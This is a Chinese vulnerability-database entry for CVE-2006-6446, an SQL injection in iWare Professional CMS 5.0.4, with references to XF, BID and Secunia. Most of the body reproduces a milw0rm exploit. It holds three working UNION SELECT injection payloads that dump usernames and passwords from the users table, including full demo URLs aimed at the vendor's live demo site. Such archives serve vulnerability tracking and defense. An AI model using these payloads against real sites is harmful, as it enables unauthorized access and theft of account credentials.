投稿
https://www.exploit-db.com/exploits/8305
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-193
iWare Professional 'Index.PHP' SQL注入漏洞
| 漏洞ID | 1117517 | 漏洞类型 | SQL注入 |
| 发布时间 | 2009-03-29 | 更新时间 | 2009-03-29 |
 CVE编号
|
CVE-2006-6446 |  CNNVD-ID
|
CNNVD-200612-193 |
| 漏洞平台 | PHP | CVSS评分 | 6.8 |
|漏洞来源
|漏洞详情
iWareProfessional5.0.4及存在SQL注入漏洞,当magic_quotes_gpc禁用时,远程攻击者可以通过D参数执行任意SQL命令。
|漏洞EXP
###################################################################
CMS IWARE 5.0.4 REMOTE SQL-injection vulnerability
###################################################################
###################################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N, KHG, chs, redc00de
#[~] Vulnerability : Remote SQL-injection
#[~] Google Dork : N/W
--------------------------------------------------
#[!] Product Site : www.iwarecms.nl
#[!] Download CMS : http://www.iwarecms.nl/download.php?f=IWARE_5.0.4.zip
#[!] Version : 5.0.4
###################################################
[+] Remote SQL injection
Example:
http://localhost/path/index.php?D=[SQL injection]
SQL:
'/**/and/**/1=2/**/UNION/**/SELECT/**/concat(username,char(58),password)+from+iware_users/*
Demo:
http://www.iwarecms.nl/demo/index.php?D=63'/**/and/**/1=2/**/UNION/**/SELECT/**/concat(username,char(58),password)+from+demo_users/*
-----------------
Example 2:
http://localhost/path/index.php?D=52&cmd=33&file=NewsArticles_1.0.0&view=1&category=&id=[SQL injection]
SQL:
'/**/and/**/1=2/**/UNION/**/SELECT/**/0,1,2,concat(username,char(58),password),4,null+from+iware_users/*
Demo 2:
http://www.iwarecms.nl/demo/index.php?D=52&cmd=33&file=NewsArticles_1.0.0&view=1&category=&id=3'/**/and/**/1=2/**/UNION/**/SELECT/**/0,1,2,concat(username,char(58),password),4,null+from+demo_users/*
-----------------
Example 3:
http://localhost/path/index.php?D=54&cmd=33&file=ImageGallery_1.0.0&category=[SQL injection]
SQL:
'/**/and/**/1=2/**/UNION/**/SELECT/**/0,1,null,concat(username,char(58),password)+from+iware_users/*
http://www.iwarecms.nl/demo/index.php?D=54&cmd=33&file=ImageGallery_1.0.0&category=2'/**/and/**/1=2/**/UNION/**/SELECT/**/0,1,null,concat(username,char(58),password)+from+demo_users/*
##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] R.I.P redc00de
##############################
# milw0rm.com [2009-03-29]|参考资料
来源:XF
名称:iware-index-sql-injection(30743)
链接:http://xforce.iss.net/xforce/xfdb/30743
来源:BID
名称:21467
链接:http://www.securityfocus.com/bid/21467
来源:SECUNIA
名称:23076
链接:http://secunia.com/advisories/23076
检索漏洞
开始时间
结束时间